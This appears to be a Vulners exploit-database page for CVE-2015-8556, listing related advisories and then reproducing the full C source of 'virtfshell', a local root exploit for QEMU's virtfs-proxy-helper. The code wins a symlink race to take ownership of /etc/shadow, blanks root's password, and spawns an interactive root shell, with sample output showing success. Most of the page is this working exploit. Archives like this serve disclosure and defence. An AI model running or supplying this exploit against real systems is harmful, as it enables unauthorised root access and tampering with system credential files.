Vulners
Lucene search
Gentoo Local Privilege Escalation in QEMU Exploit
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | The vulnerability of the QEMU hardware emulation software allows a hacker to trigger a service failure or increase their privileges in the guest operating system. | 3 Apr 201700:00 | – | bdu_fstec |
 | QEMU Elevation of Privilege Vulnerability | 23 Feb 201600:00 | – | cnvd |
 | CVE-2015-8556 | 24 Mar 201714:00 | – | cve |
 | CVE-2015-8556 | 24 Mar 201714:00 | – | cvelist |
 | CVE-2015-8556 | 24 Mar 201714:00 | – | debiancve |
 | GLSA-201602-01 : QEMU: Multiple vulnerabilities (Venom) | 5 Feb 201600:00 | – | nessus |
 | QEMU: Multiple vulnerabilities | 4 Feb 201600:00 | – | gentoo |
 | CVE-2015-8556 | 24 Mar 201714:59 | – | nvd |
 | Gentoo Security Advisory GLSA 201602-01 | 5 Feb 201600:00 | – | openvas |
 | Gentoo QEMU Local Privilege Escalation | 17 Dec 201500:00 | – | packetstorm |
10
/* == virtfshell ==
*
* Some distributions make virtfs-proxy-helper from QEMU either SUID or
* give it CAP_CHOWN fs capabilities. This is a terrible idea. While
* virtfs-proxy-helper makes some sort of flimsy check to make sure
* its socket path doesn't already exist, it is vulnerable to TOCTOU.
*
* This should spawn a root shell eventually on vulnerable systems.
*
* - zx2c4
* 2015-12-12
*
*
* [email protected] ~ $ lsb_release -i
* Distributor ID: Gentoo
* [email protected] ~ $ ./virtfshell
* == Virtfshell - by zx2c4 ==
* [+] Trying to win race, attempt 749
* [+] Chown'd /etc/shadow, elevating to root
* [+] Cleaning up
* [+] Spawning root shell
* thinkpad zx2c4 # whoami
* root
*
*/
#include <stdio.h>
#include <sys/wait.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <sys/inotify.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>
static int it_worked(void)
{
struct stat sbuf = { 0 };
stat("/etc/shadow", &sbuf);
return sbuf.st_uid == getuid() && sbuf.st_gid == getgid();
}
int main(int argc, char **argv)
{
int fd;
pid_t pid;
char uid[12], gid[12];
size_t attempts = 0;
sprintf(uid, "%d", getuid());
sprintf(gid, "%d", getgid());
printf("== Virtfshell - by zx2c4 ==\n");
printf("[+] Beginning race loop\n");
while (!it_worked()) {
printf("\033[1A\033[2K[+] Trying to win race, attempt %zu\n", ++attempts);
fd = inotify_init();
unlink("/tmp/virtfshell/sock");
mkdir("/tmp/virtfshell", 0777);
inotify_add_watch(fd, "/tmp/virtfshell", IN_CREATE);
pid = fork();
if (pid == -1)
continue;
if (!pid) {
close(0);
close(1);
close(2);
execlp("virtfs-proxy-helper", "virtfs-proxy-helper", "-n", "-p", "/tmp", "-u", uid, "-g", gid, "-s", "/tmp/virtfshell/sock", NULL);
_exit(1);
}
read(fd, 0, 0);
unlink("/tmp/virtfshell/sock");
symlink("/etc/shadow", "/tmp/virtfshell/sock");
close(fd);
kill(pid, SIGKILL);
wait(NULL);
}
printf("[+] Chown'd /etc/shadow, elevating to root\n");
system( "cp /etc/shadow /tmp/original_shadow;"
"sed 's/^root:.*/root::::::::/' /etc/shadow > /tmp/modified_shadow;"
"cat /tmp/modified_shadow > /etc/shadow;"
"su -c '"
" echo [+] Cleaning up;"
" cat /tmp/original_shadow > /etc/shadow;"
" chown root:root /etc/shadow;"
" rm /tmp/modified_shadow /tmp/original_shadow;"
" echo [+] Spawning root shell;"
" exec /bin/bash -i"
"'");
return 0;
}
# 0day.today [2018-03-13] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
17 Dec 2015 00:00Current
8.9High risk
Vulners AI Score8.9
EPSS0.21208